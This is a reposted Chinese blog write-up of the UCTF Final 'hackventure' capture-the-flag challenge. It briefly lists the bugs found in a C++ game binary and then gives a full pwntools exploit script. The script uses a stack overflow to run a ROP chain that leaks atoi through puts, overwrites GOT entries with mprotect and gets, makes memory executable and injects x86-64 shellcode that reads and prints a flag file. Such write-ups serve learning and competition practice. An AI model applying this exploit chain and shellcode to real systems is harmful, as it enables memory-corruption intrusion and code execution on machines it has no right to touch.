码迷,mamicode.com
首页 > 其他好文 > 详细

UCTF Final-Hackventure

时间:2016-08-23 20:24:30      阅读:155      评论:0      收藏:0      [点我收藏+]

标签:

  抽出世间将UCTF Final中的hackventure给记录下,算是个总结。题目是有一个游戏,游戏地图是随机生成的,用户可以攻打Server,如果3个Server都被攻占的话,那么用户就赢了,但是并没有Flag。

  题目以及IDB见:http://files.cnblogs.com/files/wangaohui/hackventure-blog.zip

  题目是一个C++的题目,结构体也不少,把结构体都建立后,逆起来轻松不少。把题目逆了一遍后,首先发现的是个整数溢出,然而并不知道怎么利用。其次发现的还有对空指针进行解引用造成的崩溃,以及free后全局变量区指针并没有清零等。但是这些都不知道怎么利用。后来发现一个栈溢出,而且溢出的空间很大,完全可以来做ROP,在程序本身的_libc_csu_init里有好用的通用Gadget。

技术分享

  漏洞位置:

技术分享

EXP:

技术分享
import sys
from pwn import *
#context.log_level=‘debug‘
#by wah

exe = hackventure
ip = 127.0.0.1
port = 10001
#ip = ‘10.250.100.12‘
#port = 6666

me = [0,0]
home = [0,0]
store = [0,0]
server = [[0,0],[0,0],[0,0]] 

#100 10.10.10.1
#200 10.1.11.1
server100 = [0,0]
server200 = [0,0]
server300 = [0,0]

def getpid():
    time.sleep(0.1)
    pid= pwnlib.util.proc.pidof(exe)
    print pid
    raw_input(go!)
def walk(f,t):
    if f==t:
        return
    global r
    x= t[0]-f[0]
    y = t[1]-f[1]
    #print f,t
    #print x,y
    if x<0:
        for i in range(-x):
            r.sendline(go up)
    elif x>0:
        for i in range(x):
            r.sendline(go down)
    else:
        pass
    if y<0:
        for i in range(-y):
            r.sendline(go left)
    elif y>0:
        for i in range(y):
            r.sendline(go right)
    else:
        pass
        
def getinfo():
    global r,me,home,store,server,server100,server200,server300
    r.recvuntil(+--------------------------------+\n)
    matrix = r.recvuntil(\n+--------------------------------+\n)
    print matrix
    #print binascii.hexlify(matrix)
    sr = []
    for i in range(len(matrix)):
        if matrix[i] == T:
            s = i
        elif matrix[i] == S:
            sr.append(i)
        elif matrix[i] == H:
            h = i
        elif matrix[i] == *:
            m = i
        else:
            pass
    me[1] = m%35
    me[0] = m/35+1
    
    home[1] = h%35
    home[0] = h/35+1

    store[1] = s%35
    store[0] = s/35+1

    server[0][1] = sr[0]%35
    server[0][0] = sr[0]/35+1

    server[1][1] = sr[1]%35
    server[1][0] = sr[1]/35+1

    server[2][1] = sr[2]%35
    server[2][0] = sr[2]/35+1

    walk(me,server[0])
    me = server[0]
    r.sendline(explore)
    r.recvuntil(IP: )
    ip = r.recvuntil(\n).strip()
    #print ip
    r.recvuntil(HP: )
    hp = r.recvuntil(\n).strip()
    if ip == 10.10.10.1:
        server100 = server[0]
    elif ip == 10.1.11.1:
        server200 = server[0]
    else:
        server300 = server[0]
    data = r.recvuntil($ )

    walk(me,server[1])
    me = server[1]
    r.sendline(explore)
    r.recvuntil(IP: )
    ip = r.recvuntil(\n).strip()
    #print ip
    r.recvuntil(HP: )
    hp = r.recvuntil(\n).strip()
    if ip == 10.10.10.1:
        server100 = server[1]
    elif ip == 10.1.11.1:
        server200 = server[1]
    else:
        server300 = server[1]
    data = r.recvuntil($ )

    walk(me,server[2])
    me = server[2]
    r.sendline(explore)
    r.recvuntil(IP: )
    ip = r.recvuntil(\n).strip()
    #print ip
    r.recvuntil(HP: )
    hp = r.recvuntil(\n).strip()
    if ip == 10.10.10.1:
        server100 = server[2]
    elif ip == 10.1.11.1:
        server200 = server[2]
    else:
        server300 = server[2]
    data = r.recvuntil($ )
    #print server100,server200,server300
def local_attack():
    r.sendline(local_attack)
def remote_attack(ip):
    r.sendline(remote_attack  + ip)
def remote_attacks(ips):
    r.sendline(remote_attacks  + ips)

r = remote(ip,port)
r.sendline(map)
getinfo()

walk(me,server100)
me=server100

local_attack()
local_attack()
r.recvuntil(You have compromised server 10.10.10.1, good job!\n)
r.sendline(5)
r.recvuntil(Name? )
r.sendline(wah)
#remote_attack(‘10.1.11.1‘)

r.sendline(status)
r.recvuntil(*** Hacker\‘s Profile ***)
r.recvuntil($ )

walk(me,home)
me=home

r.sendline(goodnight)
walk(me,server100)
me=server100
getpid()

sc = ‘‘‘call a;
a:pop rcx;
add rcx,35
push rcx
ret
.string "/home/flag/hackventure/flag";
lea rdi,[rcx-28];
mov rax,2;
mov rsi,0;
syscall;
mov rdi,rax;
xor rax,rax;
mov rsi,0x605200;
mov rdx,16;
syscall;
mov rdi,1;
mov rsi,0x605200;
mov rdx,16;
mov rax,1;
syscall;
mov rax,60;
xor rdi,rdi;
syscall;‘‘‘
shellcode=asm(sc,arch=amd64,os=linux)

fakeebp = 0xaaaaaaaaaaaaaaaa
pop_rdi_ret = 0x4029F3
pop_rsi_r15_ret = 0x4029F1
atoi_got = 0x604098
puts_plt = 0x400840
call_getstring = 0x4014BC
#buf_to_store_mprotect = 0x604600
buf_to_store_mprotect_gets = 0x6040A0
buflen = 18
rubbish = 0xaaaaaaaa
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x4029EA
call_mprotect = 0x4029D0
memo_to_exec = 0x604000
memo_len = 0x3000
memo_prot = 0x7
shellcode_addr = 0x605000
shellcode_len = 0x1000
plt_jmp_gets = 0x400940

rop = ‘‘
rop += p64(pop_rdi_ret)
rop += p64(atoi_got)
rop += p64(puts_plt)

rop += p64(pop_rdi_ret)
rop += p64(buf_to_store_mprotect_gets)
rop += p64(pop_rsi_r15_ret)
rop += p64(buflen)
rop += p64(rubbish)
rop += p64(call_getstring)
rop += a*0x68

rop += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
rop += p64(0)
rop += p64(1)
rop += p64(buf_to_store_mprotect_gets)
rop += p64(memo_prot)
rop += p64(memo_len)
rop += p64(memo_to_exec)
rop += p64(call_mprotect)

rop += p64(rubbish)
rop += p64(0)#rbx
rop += p64(0)#rbp
rop += p64(0)#r12
rop += p64(0)#r13
rop += p64(0)#r14
rop += p64(0)#r15
rop += p64(pop_rdi_ret)
rop += p64(shellcode_addr)
rop += p64(plt_jmp_gets)
rop += p64(shellcode_addr)

fuck1 = p64(fakeebp) + rop
remote_attacks(1,2,3,4,+fuck1)
walk(me,server300)
local_attack()
local_attack()
local_attack()
local_attack()
local_attack()
r.recvuntil(Game Over!\n)
data = r.recvuntil(\n)[:-1]
atoi = u64(data + (8-len(data))*\x00)
log.info("Leaked atoi: "+hex(atoi))

mprotect = atoi+0xbaa30 
gets = atoi +0x354d0
data = p64(mprotect) + p64(gets)
#overwrite got to mprotect and gets
r.sendline(data)
#write shellcode
r.sendline(shellcode)
r.recvuntil(Please own this server first.\n)
flag = r.recv(16)
print flag
r.close()
View Code

 

 

UCTF Final-Hackventure

标签:

原文地址:http://www.cnblogs.com/wangaohui/p/5800568.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!